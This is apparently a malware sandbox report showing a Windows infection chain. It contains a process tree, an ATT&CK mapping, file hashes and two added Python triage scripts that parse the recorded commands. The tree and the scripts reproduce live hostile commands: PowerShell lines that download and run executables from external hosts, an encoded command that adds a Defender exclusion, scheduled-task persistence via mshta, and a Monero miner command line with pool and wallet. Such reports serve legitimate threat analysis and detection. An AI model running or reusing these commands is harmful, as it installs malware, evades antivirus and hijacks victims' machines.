C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2468
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
PID:3028 -
[depth 8] C:\Program Files\Mozilla Firefox\firefox.exe
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.0.1174445238\266119282" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1112 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e535af16-3b2c-4548-93c4-9f32ff5e4b9b} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 1348 106d6a58 gpu
  PID: 2140
[depth 8] C:\Program Files\Mozilla Firefox\firefox.exe
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.1.1280560757\1779558659" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1528 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {81903a30-17e5-42c5-94b3-8568753f68c8} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 1560 f4eb558 socket
  PID: 408
[depth 8] C:\Program Files\Mozilla Firefox\firefox.exe
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.2.1258258265\1483581124" -childID 1 -isForBrowser -prefsHandle 2004 -prefMapHandle 2000 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a575873a-673a-4d84-9373-8ebef6f15e9c} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 2016 1935cf58 tab
  PID: 864
[depth 8] C:\Program Files\Mozilla Firefox\firefox.exe
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.3.1902900574\1786330313" -childID 2 -isForBrowser -prefsHandle 2604 -prefMapHandle 2592 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7ce6b7a-37b6-40ba-9fa8-def9391ffaa3} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 2616 1acce458 tab
  PID: 3040
[depth 8] C:\Program Files\Mozilla Firefox\firefox.exe
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.4.2003793953\107605765" -childID 3 -isForBrowser -prefsHandle 3592 -prefMapHandle 3684 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {923f6f81-d5b5-43d6-b120-0bca19b62d6d} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 3720 3f36f58 tab
  PID: 2200
[depth 8] C:\Program Files\Mozilla Firefox\firefox.exe
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.5.1056933089\592115763" -childID 4 -isForBrowser -prefsHandle 3828 -prefMapHandle 3832 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1a52280-8e31-4e99-85b0-8ac20bcf90c9} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 3816 3f34558 tab
  PID: 2152
[depth 8] C:\Program Files\Mozilla Firefox\firefox.exe
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.6.838119302\744785716" -childID 5 -isForBrowser -prefsHandle 3992 -prefMapHandle 3996 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf7039da-b232-41e6-8c7c-91ff4d72e0ba} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 3980 3f36058 tab
  PID: 2800
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222740101\7f23b4fca3.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222740101\7f23b4fca3.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID: 2844
[depth 6] C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 800
  - Program crash
  PID: 1164
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222750101\97c390f6c8.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222750101\97c390f6c8.exe"
  PID: 3588
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222760101\fcaefc77e9.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222760101\fcaefc77e9.exe"
  PID: 3816
[depth 6] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn qoRQamaxbnl /tr "mshta C:\Users\Admin\AppData\Local\Temp\aQhHFQUkT.hta" /sc minute /mo 25 /ru "Admin" /f
  PID: 3836
[depth 7] C:\Windows\SysWOW64\schtasks.exe
  cmdline: schtasks /create /tn qoRQamaxbnl /tr "mshta C:\Users\Admin\AppData\Local\Temp\aQhHFQUkT.hta" /sc minute /mo 25 /ru "Admin" /f
  - Scheduled Task/Job: Scheduled Task
  PID: 3904
[depth 6] C:\Windows\SysWOW64\mshta.exe
  cmdline: mshta C:\Users\Admin\AppData\Local\Temp\aQhHFQUkT.hta
  PID: 3844
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RLEMVCHJQGCOFKRORYILDBJF1YQ5RHU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
  - Command and Scripting Interpreter: PowerShell
  PID: 3920
[depth 8] C:\Users\Admin\AppData\Local\TempRLEMVCHJQGCOFKRORYILDBJF1YQ5RHU1.EXE
  cmdline: "C:\Users\Admin\AppData\Local\TempRLEMVCHJQGCOFKRORYILDBJF1YQ5RHU1.EXE"
  PID: 4012
[depth 5] C:\Windows\SysWOW64\cmd.exe
  cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\10222770121\am_no.cmd" "
  PID: 2304
[depth 6] C:\Windows\SysWOW64\timeout.exe
  cmdline: timeout /t 2
  - Delays execution with timeout.exe
  PID: 3156
[depth 6] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
  PID: 3128
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
  - Command and Scripting Interpreter: PowerShell
  PID: 3292
[depth 6] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
  PID: 3412
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
  - Command and Scripting Interpreter: PowerShell
  PID: 3420
[depth 6] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
  PID: 3484
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
  - Command and Scripting Interpreter: PowerShell
  PID: 3492
[depth 6] C:\Windows\SysWOW64\schtasks.exe
  cmdline: schtasks /create /tn "EM9RnmaNX4D" /tr "mshta \"C:\Temp\cwiYK8V3f.hta\"" /sc minute /mo 25 /ru "Admin" /f
  - Scheduled Task/Job: Scheduled Task
  PID: 3736
[depth 6] C:\Windows\SysWOW64\mshta.exe
  cmdline: mshta "C:\Temp\cwiYK8V3f.hta"
  PID: 3776
[depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
  - Command and Scripting Interpreter: PowerShell
  PID: 3840
[depth 8] C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
  PID: 2188
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222780101\j21Hq7C.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222780101\j21Hq7C.exe"
  PID: 2984
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222790101\b0hgYat.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222790101\b0hgYat.exe"
  PID: 3372
[depth 6] C:\Users\Admin\AppData\Local\Temp\10222790101\b0hgYat.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222790101\b0hgYat.exe"
  PID: 2228
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222800101\ADFoyxP.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222800101\ADFoyxP.exe"
  PID: 3468
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"
  - Command and Scripting Interpreter: PowerShell
  PID: 3416
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222810101\9JFiKVm.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222810101\9JFiKVm.exe"
  PID: 3832
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222820101\packed.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222820101\packed.exe"
  PID: 3956
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
  (the -EncodedCommand payload is base64 of UTF-16LE text and decodes to: Add-MpPreference -ExclusionPath 'C:\Program Files\RuntimeApp', i.e. a Defender exclusion for the directory the next child runs from)
  - Command and Scripting Interpreter: PowerShell
  PID: 2032
[depth 6] C:\Windows\system32\schtasks.exe
  cmdline: schtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10222820101\packed.exe" /sc onlogon /rl HIGHEST /f
  - Scheduled Task/Job: Scheduled Task
  PID: 3228
[depth 6] C:\Program Files\RuntimeApp\0000009559.exe
  cmdline: "C:\Program Files\RuntimeApp\0000009559.exe"
  PID: 3348
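The PowerShell command lines in this tree (PIDs 3920, 3840, 3416 and 2032) are the parts an analyst usually wants machine-readable: the download URL, the drop path, the hidden-window flag, and the `-EncodedCommand` payload. The script below is an added triage example, not part of the sandbox report or of the malware; the four command lines are copied verbatim from the tree, while the function names and the TEMP value used to stand in for `$env:temp` are this example's own assumptions. It also shows why the first HTA's payload ran from `C:\Users\Admin\AppData\Local\TempRLEMV...EXE` (no backslash between `$env:temp` and the file name, as recorded above) while the second HTA's payload, whose name starts with a backslash, landed inside Temp.

```python
"""Triage of the PowerShell command lines recorded in this process tree.

Added example, not part of the sandbox report. The command lines are copied
verbatim from the tree; function names and the simulated TEMP value are
this example's own assumptions.
"""
import base64
import re

CMD_HTA_1 = (  # PID 3920 (spawned via aQhHFQUkT.hta)
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden '''
    r"$d=$env:temp+'RLEMVCHJQGCOFKRORYILDBJF1YQ5RHU1.EXE';"
    r"(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;"
)
CMD_HTA_2 = (  # PID 3840 (spawned via cwiYK8V3f.hta)
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden '''
    r"$d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';"
    r"(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;"
)
CMD_IWR = (  # PID 3416 (child of ADFoyxP.exe)
    r'''powershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' '''
    r'''-OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"'''
)
CMD_ENCODED = (  # PID 2032 (child of packed.exe)
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA="
)

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
EXCLUSION_RE = re.compile(r"(?i)Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+'([^']+)'")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...),
    and the payload is base64 over UTF-16LE text, so both are handled here.
    """
    for m in re.finditer(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", cmdline):
        flag, payload = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):  # e.g. -ExecutionPolicy
            continue
        try:
            return base64.b64decode(payload, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def simulate_env_temp_concat(cmdline, temp=r"C:\Users\Admin\AppData\Local\Temp"):
    """Evaluate $env:temp+'<name>' the way PowerShell does: plain string
    concatenation, no separator inserted. `temp` is an assumed value; the
    sandbox user's real TEMP is the same directory as far as the tree shows."""
    m = re.search(r"\$env:temp\+'([^']+)'", cmdline, re.IGNORECASE)
    return temp + m.group(1) if m else None


def triage(cmdline):
    """Summarise the indicators a detection engineer would pull from one command line."""
    decoded = decode_encoded_command(cmdline)
    effective = decoded if decoded is not None else cmdline
    return {
        "hidden_window": bool(re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmdline)),
        "encoded": decoded is not None,
        "decoded": decoded,
        "urls": URL_RE.findall(effective),
        "defender_exclusions": EXCLUSION_RE.findall(effective),
        "drop_path": simulate_env_temp_concat(effective),
        "custom_user_agent": bool(re.search(r"(?i)User-Agent", effective)),
    }


if __name__ == "__main__":
    for name, cmd in [("HTA_1", CMD_HTA_1), ("HTA_2", CMD_HTA_2), ("IWR", CMD_IWR), ("ENC", CMD_ENCODED)]:
        print(name, triage(cmd))
```

Running it prints one dictionary per command line; the `drop_path` of `CMD_HTA_1` reproduces the `...\Local\TempRLEMV...EXE` image path the sandbox recorded for PID 4012, and `decoded` for `CMD_ENCODED` is the `Add-MpPreference` exclusion for `C:\Program Files\RuntimeApp`.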
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222830101\O9s3coZ.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222830101\O9s3coZ.exe"
  PID: 2616
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222840101\v6Oqdnc.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222840101\v6Oqdnc.exe"
  PID: 3444
[depth 6] C:\Windows\SysWOW64\WerFault.exe
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 1284
  - Program crash
  PID: 3164
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222850101\HmngBpR.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222850101\HmngBpR.exe"
  PID: 3972
[depth 6] C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
  PID: 3888
[depth 7] C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
  cmdline: C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
  PID: 3360
[depth 8] C:\Windows\SysWOW64\cmd.exe
  cmdline: C:\Windows\SysWOW64\cmd.exe
  PID: 3752
[depth 9] C:\Windows\SysWOW64\explorer.exe
  cmdline: C:\Windows\SysWOW64\explorer.exe
  PID: 3228
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222860101\zY9sqWs.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222860101\zY9sqWs.exe"
  PID: 3292
[depth 6] C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
  PID: 2460
[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\'
  - Command and Scripting Interpreter: PowerShell
  PID: 2856
[depth 5] C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe"
  PID: 1596
[depth 6] C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe curl.dll
  PID: 4048
[depth 6] C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
  PID: 3876
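The last Esu6YYl.exe invocation (PID 3876) carries the whole mining configuration on its command line in XMRig's option syntax: pool host and port, wallet, worker password, donation level and a pinned TLS certificate fingerprint. The script below is an added example, not part of the report or of the miner; the command line is copied verbatim from the tree, and the parser, the Monero address shape check, and the function names are this example's own. The address check only tests length, prefix and base58 alphabet; it does not verify the embedded checksum.

```python
"""Extract the miner configuration from an XMRig-style command line.

Added example, not part of the sandbox report. CMD_MINER is copied verbatim
from the process tree (PID 3876); parser and address check are this
example's own.
"""

CMD_MINER = (
    r"C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe --url pool.hashvault.pro:443 "
    "--user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs "
    "--pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)

# Base58 alphabet (no 0, O, I, l); Monero addresses use it.
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def parse_long_opts(cmdline):
    """Split a command line into (image, {option: value}) for --long options.
    Accepts both '--opt value' and '--opt=value'; a switch with no value
    (like --tls) maps to True. Positional tokens are ignored."""
    tokens = cmdline.split()
    image, args = tokens[0], tokens[1:]
    opts = {}
    i = 0
    while i < len(args):
        tok = args[i]
        if tok.startswith("--"):
            if "=" in tok:
                key, val = tok[2:].split("=", 1)
                opts[key] = val
            elif i + 1 < len(args) and not args[i + 1].startswith("--"):
                opts[tok[2:]] = args[i + 1]
                i += 1
            else:
                opts[tok[2:]] = True
        i += 1
    return image, opts


def looks_like_monero_address(s):
    """Structural check: standard mainnet addresses are 95 base58 chars
    starting with '4'; subaddresses start with '8'; integrated addresses
    are 106 chars. The checksum is not verified."""
    if not isinstance(s, str) or not s or s[0] not in "48":
        return False
    if len(s) not in (95, 106):
        return False
    return all(c in BASE58 for c in s)


def mining_config(cmdline):
    """Summarise pool, wallet, TLS pinning and donation level from the command line."""
    image, opts = parse_long_opts(cmdline)
    url = opts.get("url")
    host = port = None
    if isinstance(url, str):
        host, sep, port_s = url.rpartition(":")
        if not sep:            # no port given
            host, port_s = url, ""
        port = int(port_s) if port_s.isdigit() else None
    wallet = opts.get("user") if isinstance(opts.get("user"), str) else None
    donate = opts.get("donate-level")
    return {
        "image": image,
        "pool_host": host,
        "pool_port": port,
        "wallet": wallet,
        "wallet_is_monero": looks_like_monero_address(wallet),
        "tls": opts.get("tls") is True,
        "tls_fingerprint": opts.get("tls-fingerprint"),
        "donate_level": int(donate) if isinstance(donate, str) and donate.isdigit() else None,
    }


if __name__ == "__main__":
    for k, v in mining_config(CMD_MINER).items():
        print(f"{k}: {v}")
```

The pinned `--tls-fingerprint` is worth keeping as an indicator alongside the pool hostname: it identifies the pool's TLS certificate, so a proxy or DNS change that still presents that certificate keeps the miner working, and a change of certificate on the pool side breaks it.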
[depth 3] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 2996
[depth 4] C:\Users\Admin\AppData\Local\Temp\93R1PJ3LML991IHAH15X.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\93R1PJ3LML991IHAH15X.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID: 2052
[depth 2] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID: 1516
Network
MITRE ATT&CK Enterprise v15
(number in parentheses: matched signature count for that technique or sub-technique)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Modify Registry (2)
- Subvert Trust Controls (1): Install Root Certificate (1)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (3): Credentials In Files (3)
Discovery
- Browser Information Discovery (1)
- Query Registry (7)
- Remote System Discovery (1)
- System Information Discovery (4)
- System Location Discovery (1): System Language Discovery (1)
- System Network Configuration Discovery (1): Internet Connection Discovery (1)
- Virtualization/Sandbox Evasion (2)
Downloads
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD5d1bf64b60125dd33574cead57388d988
SHA163fd1b9c1ed168ebb93e75c4de1d569b0b016f31
SHA25686d4818f13f29936b70026e61874772631a7bfc6c4848e2ea9c59e4dc7abf5af
SHA5122a4ba076160af6fecd2da2ed926dfa6907f32d69a1edf6fec64bc937521e395b66760274a91ad7b495972886348e7a9acbabb8fba66df2e9f5f9e1e0ea3ba6cb
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
669KB
MD5963a766b3b8d33b4f0471c74b9cbec7c
SHA1e342e54e02d430c2c5413d85d775c696fe1289f8
SHA2567986641712e76a0b74fe66dce29d9bd7d3f37cf9f70e91424fa38d51a2297bba
SHA512cc75571ca52a54471dc43359d7ab984898c90f634c73a24d32a7bd9ac632763b679a876e87b292cb33327eac50640d0b6383473f669a8035a50f048a34ef8b38
-
Filesize
479KB
MD525f00b7c2ff3ae44d849863c1e47b096
SHA190203d582817c0b1e0778e53ab8ef63c2505d912
SHA2560a7602edc5309eb0683609f1e54bc11052e046b2b3f61f64397526fa935d7c6d
SHA512144af31085439aabccd2502e3999de5952e58b708ccc9b8254381caf74130bec801f67a55c06614814a311b3093cdc88ebddc63508557b2157c0b15f88f23a15
-
Filesize
6.1MB
MD52188546b6cf8cb7ac5e86971bbdcb162
SHA12f2b046e363dc151363e992db99cb796d73065e4
SHA2564d9a7bd2e38992896c29e87c4f9e98cbd67fbdb10176132a5f4980a502dd314d
SHA512f22662ce1f3b7413dd93b547f4a401edaf5c181de478340b9a3459586bc2c08379467c610e526f482f3e3d951394b845fea47fe8d3064b5f3ff5a6f8a192e84f
-
Filesize
17.9MB
MD52b02bcc4b6c3dd867349af718fa6cd92
SHA10a4711efa9ae7c75024bb6644b900e6329e2c378
SHA25641fdc5fd55f5488d971dba6851ebdc2fb46e68b9df2611e1928bee983f5d2746
SHA512f657a2d020be45051578e999db74f5269abf88ca25eb3e19fb52ab47f311de48d7224233f83de29d05ca192a4cb73dcaeab922f5a815a22f9dd89367f840a103
-
Filesize
7.1MB
MD5a99f280eeda0161416cd8f57a1919071
SHA11a1028069ae016ad61a9e237b6ad931fd3f047e1
SHA25641563f3ed118c57d8028a0bbd7d7bff8a8bddb87959ba99af253e4c64151de18
SHA512699904a78879454ffa5ebd584f69e3bd5cbad20f8310a9acaf2a8ed53c9d0ea57e2c345e93ac3d15d5ea5042503789ee64d330dc63c1979e31fc523e92819095
-
Filesize
479KB
MD5145dc550875d5ffce1b981c2fe9ad4a7
SHA1861cc422292d3140899f8b09b2f7d5dc22abc13b
SHA2569434b94ac39370d5b6dee2865dcb709d02030815a40841478882c853ab1dd860
SHA512b3e957dc9b6a5d653bde2ff600687b72011bc1488c85a5aebcb1400e671326ce5aaadfb746697ad4b8f3288f192f8fe92916491d4bfcbd546415d16704e3bf65
-
Filesize
481KB
MD568737830ccac68b750f9246d62f1919a
SHA149468c0a9a2d6f892ce1b5a420cb068ce79b3aae
SHA256e55905651f4bd797fff5f572f76a8da1359e9e3416ce9a93dd3a214fbdb2e47a
SHA5121ba6a105fe9b516b4eb112149414362263f54f5346a1f7e94afe9cc635f93cd9afcda7c638181f2a593e3a901274340388d599a930af8385e4d1f120571d7331
-
Filesize
943KB
MD57b263841e989d2a9f7d156e74cb36e6f
SHA1daf7c46fc057c7e3dc266faacf89652cc1cf9720
SHA2566457881894861cb853a08b65e3b63b2916f317ce6730338f0508cf84f5f930e8
SHA512b5a569ddbaf01806babcb1676dd4d74ea94e3253c4a803fa70c2cba0ba456e20a943049dd54cdcf39b51fb30b65fe9ca812a047bf65a043c02c53c9649317ee1
-
Filesize
1.7MB
MD5ce7fdac9a0dfd437a3f2204c612284e2
SHA1c2f8930cf6a7e714c524bcd0278c338e8fe6548f
